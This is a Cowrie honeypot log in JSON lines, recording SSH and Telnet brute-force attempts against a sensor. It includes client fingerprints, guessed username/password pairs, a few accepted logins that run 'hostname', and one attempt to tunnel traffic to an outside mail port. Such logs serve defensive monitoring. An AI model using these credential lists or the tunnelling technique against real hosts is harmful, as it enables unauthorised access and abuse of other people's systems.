{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59330,"dst_ip":"1.2.3.4","dst_port":22,"session":"61311deaa0bb","protocol":"ssh","message":"New connection: 217.72.205.35:59330 (1.2.3.4:22) [session: 61311deaa0bb]","sensor":"my-vps","timestamp":"2025-08-28T01:39:54.920794Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:39:54.922193Z","src_ip":"217.72.205.35","session":"61311deaa0bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60844,"dst_ip":"1.2.3.4","dst_port":23,"session":"71b193895c85","protocol":"telnet","message":"New connection: 212.227.125.160:60844 (1.2.3.4:23) [session: 71b193895c85]","sensor":"my-vps","timestamp":"2025-08-28T01:40:29.033090Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36370,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e4845524279","protocol":"ssh","message":"New connection: 212.227.235.229:36370 (1.2.3.4:22) [session: 2e4845524279]","sensor":"my-vps","timestamp":"2025-08-28T01:40:58.007775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:40:58.008655Z","src_ip":"212.227.235.229","session":"2e4845524279"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:40:58.116255Z","src_ip":"212.227.235.229","session":"2e4845524279"}
{"eventid":"cowrie.login.failed","username":"amandabackup","password":"amandabackup","message":"login attempt [amandabackup/amandabackup] failed","sensor":"my-vps","timestamp":"2025-08-28T01:40:58.446145Z","src_ip":"212.227.235.229","session":"2e4845524279"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:40:59.556535Z","src_ip":"212.227.235.229","session":"2e4845524279"}
{"eventid":"cowrie.session.closed","duration":30.574459552764893,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:40:59.607478Z","src_ip":"212.227.125.160","session":"71b193895c85"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":47284,"dst_ip":"1.2.3.4","dst_port":22,"session":"61b19a5cfa24","protocol":"ssh","message":"New connection: 194.233.79.134:47284 (1.2.3.4:22) [session: 61b19a5cfa24]","sensor":"my-vps","timestamp":"2025-08-28T01:41:30.417709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:41:31.199964Z","src_ip":"194.233.79.134","session":"61b19a5cfa24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:41:31.200599Z","src_ip":"194.233.79.134","session":"61b19a5cfa24"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-28T01:41:32.665104Z","src_ip":"194.233.79.134","session":"61b19a5cfa24"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:41:34.117974Z","src_ip":"194.233.79.134","session":"61b19a5cfa24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55242,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d86bd3b6697","protocol":"telnet","message":"New connection: 212.227.125.160:55242 (1.2.3.4:23) [session: 0d86bd3b6697]","sensor":"my-vps","timestamp":"2025-08-28T01:41:45.838805Z"}
{"eventid":"cowrie.session.closed","duration":15.359703540802002,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:01.198437Z","src_ip":"212.227.125.160","session":"0d86bd3b6697"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44588,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d8a4de49857","protocol":"telnet","message":"New connection: 212.227.125.160:44588 (1.2.3.4:23) [session: 7d8a4de49857]","sensor":"my-vps","timestamp":"2025-08-28T01:42:05.138032Z"}
{"eventid":"cowrie.session.closed","duration":1.1469979286193848,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:06.284940Z","src_ip":"212.227.125.160","session":"7d8a4de49857"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44592,"dst_ip":"1.2.3.4","dst_port":23,"session":"f09a7c4d9099","protocol":"telnet","message":"New connection: 212.227.125.160:44592 (1.2.3.4:23) [session: f09a7c4d9099]","sensor":"my-vps","timestamp":"2025-08-28T01:42:06.556986Z"}
{"eventid":"cowrie.session.closed","duration":0.6816058158874512,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:07.238517Z","src_ip":"212.227.125.160","session":"f09a7c4d9099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34788,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2ff5f9fd50d","protocol":"telnet","message":"New connection: 212.227.125.160:34788 (1.2.3.4:23) [session: a2ff5f9fd50d]","sensor":"my-vps","timestamp":"2025-08-28T01:42:07.510581Z"}
{"eventid":"cowrie.session.closed","duration":3.322997808456421,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:10.833508Z","src_ip":"212.227.125.160","session":"a2ff5f9fd50d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34838,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ac19a22c5fa","protocol":"telnet","message":"New connection: 212.227.125.160:34838 (1.2.3.4:23) [session: 0ac19a22c5fa]","sensor":"my-vps","timestamp":"2025-08-28T01:42:14.359397Z"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":5523,"dst_ip":"1.2.3.4","dst_port":22,"session":"1274cd291b50","protocol":"ssh","message":"New connection: 186.225.142.90:5523 (1.2.3.4:22) [session: 1274cd291b50]","sensor":"my-vps","timestamp":"2025-08-28T01:42:16.875287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:42:17.657961Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:42:17.658912Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.login.success","username":"root","password":"081251****","message":"login attempt [root/081251****] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:42:20.579947Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:42:21.386005Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T01:42:21.386698Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:21.665964Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:21.744568Z","src_ip":"186.225.142.90","session":"1274cd291b50"}
{"eventid":"cowrie.session.closed","duration":10.141368865966797,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:42:24.500685Z","src_ip":"212.227.125.160","session":"0ac19a22c5fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43380,"dst_ip":"1.2.3.4","dst_port":23,"session":"324f506f390c","protocol":"telnet","message":"New connection: 212.227.235.229:43380 (1.2.3.4:23) [session: 324f506f390c]","sensor":"my-vps","timestamp":"2025-08-28T01:42:58.765119Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43288,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa2403397ae7","protocol":"telnet","message":"New connection: 212.227.125.160:43288 (1.2.3.4:23) [session: aa2403397ae7]","sensor":"my-vps","timestamp":"2025-08-28T01:43:11.332938Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:43:11.418475Z","src_ip":"212.227.125.160","session":"aa2403397ae7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:43:11.438732Z","src_ip":"212.227.125.160","session":"aa2403397ae7"}
{"eventid":"cowrie.session.closed","duration":15.208930015563965,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:13.973957Z","src_ip":"212.227.235.229","session":"324f506f390c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60468,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9ceb78147a0","protocol":"telnet","message":"New connection: 212.227.235.229:60468 (1.2.3.4:23) [session: f9ceb78147a0]","sensor":"my-vps","timestamp":"2025-08-28T01:43:17.317348Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26376,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b51885a6e6f","protocol":"ssh","message":"New connection: 212.227.235.229:26376 (1.2.3.4:22) [session: 7b51885a6e6f]","sensor":"my-vps","timestamp":"2025-08-28T01:43:17.452727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:43:17.453420Z","src_ip":"212.227.235.229","session":"7b51885a6e6f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:43:17.583123Z","src_ip":"212.227.235.229","session":"7b51885a6e6f"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa112211","message":"login attempt [root/Aa112211] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:43:18.186763Z","src_ip":"212.227.235.229","session":"7b51885a6e6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T01:43:18.317115Z","session":"7b51885a6e6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T01:43:18.466909Z","src_ip":"212.227.235.229","session":"7b51885a6e6f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:18.619426Z","src_ip":"212.227.235.229","session":"7b51885a6e6f"}
{"eventid":"cowrie.session.closed","duration":3.3131258487701416,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:20.630412Z","src_ip":"212.227.235.229","session":"f9ceb78147a0"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46132,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eb08aee80cf","protocol":"ssh","message":"New connection: 194.233.79.134:46132 (1.2.3.4:22) [session: 0eb08aee80cf]","sensor":"my-vps","timestamp":"2025-08-28T01:43:22.179383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:43:22.932933Z","src_ip":"194.233.79.134","session":"0eb08aee80cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:43:22.934133Z","src_ip":"194.233.79.134","session":"0eb08aee80cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41592,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f97b2d9981d","protocol":"telnet","message":"New connection: 212.227.235.229:41592 (1.2.3.4:23) [session: 0f97b2d9981d]","sensor":"my-vps","timestamp":"2025-08-28T01:43:23.951197Z"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:43:24.882555Z","src_ip":"194.233.79.134","session":"0eb08aee80cf"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:26.176131Z","src_ip":"194.233.79.134","session":"0eb08aee80cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44515,"dst_ip":"1.2.3.4","dst_port":23,"session":"49be61e0d527","protocol":"telnet","message":"New connection: 212.227.125.160:44515 (1.2.3.4:23) [session: 49be61e0d527]","sensor":"my-vps","timestamp":"2025-08-28T01:43:28.890999Z"}
{"eventid":"cowrie.session.closed","duration":10.072082042694092,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:34.023205Z","src_ip":"212.227.235.229","session":"0f97b2d9981d"}
{"eventid":"cowrie.session.closed","duration":13.195463180541992,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:43:42.086390Z","src_ip":"212.227.125.160","session":"49be61e0d527"}
{"eventid":"cowrie.session.connect","src_ip":"198.98.53.110","src_port":41824,"dst_ip":"1.2.3.4","dst_port":23,"session":"80df3f0df679","protocol":"telnet","message":"New connection: 198.98.53.110:41824 (1.2.3.4:23) [session: 80df3f0df679]","sensor":"my-vps","timestamp":"2025-08-28T01:44:01.087055Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":54040,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f1c45f117de","protocol":"ssh","message":"New connection: 77.83.240.46:54040 (1.2.3.4:22) [session: 6f1c45f117de]","sensor":"my-vps","timestamp":"2025-08-28T01:44:06.885303Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:44:06.905100Z","src_ip":"77.83.240.46","session":"6f1c45f117de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62367,"dst_ip":"1.2.3.4","dst_port":22,"session":"64371176f211","protocol":"ssh","message":"New connection: 212.227.125.160:62367 (1.2.3.4:22) [session: 64371176f211]","sensor":"my-vps","timestamp":"2025-08-28T01:44:44.577437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:44:44.578393Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:44:45.304023Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie","message":"login attempt [macie/macie] failed","sensor":"my-vps","timestamp":"2025-08-28T01:44:45.751305Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1","message":"login attempt [macie/macie1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:44:46.861973Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie123","message":"login attempt [macie/macie123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:44:47.950138Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1234","message":"login attempt [macie/macie1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:44:49.061700Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie12345","message":"login attempt [macie/macie12345] failed","sensor":"my-vps","timestamp":"2025-08-28T01:44:50.176340Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:44:51.278934Z","src_ip":"212.227.125.160","session":"64371176f211"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":49792,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3ddecd89173","protocol":"ssh","message":"New connection: 194.233.79.134:49792 (1.2.3.4:22) [session: c3ddecd89173]","sensor":"my-vps","timestamp":"2025-08-28T01:44:55.842711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:44:55.843413Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:44:56.440033Z","src_ip":"194.233.79.134","session":"c3ddecd89173"}
